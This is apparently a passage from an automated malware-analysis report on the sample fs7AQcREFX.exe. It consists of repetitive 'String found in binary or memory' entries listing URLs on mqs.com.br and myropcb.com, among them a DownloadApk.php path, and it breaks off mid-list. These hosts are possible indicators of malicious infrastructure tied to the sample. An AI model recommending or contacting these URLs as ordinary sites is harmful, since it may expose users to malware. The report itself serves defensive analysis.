                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/Z
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389907841.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/d
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/l
                      Source: fs7AQcREFX.exe, 00000000.00000003.389907841.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/p
                      Source: fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/saenh.dll0
                      Source: fs7AQcREFX.exe, 00000000.00000003.389748262.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/saenh.dll_X%
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/xK
                      Source: fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/~
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/blog/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/comments/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/suggestion-box/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/download/DownloadApk.php
                      Source: fs7AQcREFX.exe, 00000000.00000003.630948415.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/f
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, 